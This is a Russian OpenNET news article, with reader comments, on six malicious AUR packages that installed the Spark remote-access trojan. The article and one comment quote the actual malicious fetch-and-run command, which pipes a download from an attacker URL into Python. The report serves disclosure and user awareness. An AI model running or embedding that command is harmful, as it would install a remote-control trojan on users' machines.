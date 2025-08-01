The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

01.08.2025 21:56

В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда 'python -c "$(curl https://segs.lol/9wUb1Z)"', загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет google-chrome-stable был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления google-chrome-stable в AUR были загружены два вредоносных пакета - "chrome" и "chrome-bin", содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

  1. Главная ссылка к новости (https://www.reddit.com/r/archl...)
  2. OpenNews: В AUR-репозитории Arch Linux выявлены вредоносные пакеты
  3. OpenNews: Релиз Aura 4.0.0, пакетного менеджера для Arch Linux
  4. OpenNews: Выпуск пакетного менеджера pacstall 5.0, развивающего аналог AUR для Ubuntu
  5. OpenNews: Эксперимент по получению контроля над пакетами в репозитории AUR
  6. OpenNews: В AUR-репозитории Arch Linux найдено вредоносное ПО
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63662-arch
Ключевые слова: arch, aur, malware
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (28) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 22:35, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    > python -c "$(curl https://segs.lol/9wUb1Z)"

    LOL!

     
  • 1.2, Аноним (2), 22:36, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    В AUR-репозитории выявлен безвредный пакет.
     

  • 1.3, Аноним (3), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
     
     
  • 2.5, Аноним (5), 22:52, 01/08/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    виноват в первую очередь сам пользователь

    Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

    Ведь всю помойку тянут на ПК.. всю!

     

  • 1.4, Аноним (5), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Так можно туннели бекдором до SSH кидать и компом чужим управлять..

     
  • 1.6, Аноним (6), 22:58, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    И что теперь делать?
     
     
  • 2.7, Аноним (7), 23:10, 01/08/2025 [^] [^^] [^^^] [ответить]  
    		• +6 +/
    Читать пкгбилды аура перед запуском.

    Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

     
  • 2.16, НяшМяш (ok), 00:12, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
     
  • 2.26, Аноним (22), 02:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
     
  • 2.28, Bottle (?), 02:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
     

  • 1.8, zionist (ok), 23:13, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –7 +/
    Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования.
     
     
  • 2.9, Аноним (9), 23:18, 01/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    В аур пакеты проверяются сообществом и исходники открыты, что снижает риски. А вот что творится в сторонних пользовательских репозиториях других систем, например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно. Разница лишь в прозрачности
     
     
  • 3.13, Аноним (13), 23:34, 01/08/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >снижает риски

    Снижають, снижають, милок, не боись! Новость читал?

     
     
  • 4.15, Аноним (9), 00:05, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    снижают, но не исключают. бабуль, ложись спать
     
  • 2.11, Аноним (11), 23:31, 01/08/2025 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Аур это такой же арч, как ppa дебиан.
     
     
  • 3.17, НяшМяш (ok), 00:13, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Аур лучше, исходники прямо в вебморде можно посмотреть. Как там у ппа с отображением рецепта сборки?
     
  • 3.27, penetrator (?), 02:40, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    а в арче без AUR можно жить?

    кстати что там с Packman ему можно доверять?

     
  • 2.23, Аноним (22), 02:09, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Ты что, опять таблетки принять забыл?
     

  • 1.10, freeperson (?), 23:30, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
     
     
  • 2.14, Аноним (14), 00:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Гентушникам тоже ухо держать востро в отношении к оверлеям.
     
  • 2.24, Аноним (22), 02:16, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > AUR это та ещё помойка, где никто не проверяет ничего.
    > Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

    Держи в курсе.

    > ставьте Слаку или Gentoo, и будет вам счастье.

    Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

     

  • 1.12, Beta Version (ok), 23:33, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –5 +/
    Арч со своим АУР - ненужная помойка. Если раньше его можно было использовать для понтов, то сегодня он просто не нужен.
     
     
  • 2.18, НяшМяш (ok), 00:14, 02/08/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Габен, гребущий лопатой деньги со стимдеков, сидит понтуется.
     
  • 2.19, Аноним (19), 00:24, 02/08/2025 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.25, Аноним (22), 02:23, 02/08/2025 Скрыто ботом-модератором     [к модератору]
    		• +/
     

  • 1.20, Аноним (20), 01:02, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
     
  • 1.21, Аноним (22), 02:04, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    По кринжовости действий, представляется что-то вроде "Мамин пирожочек возомнил себя кулхацкером, и набегает на AUR".
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру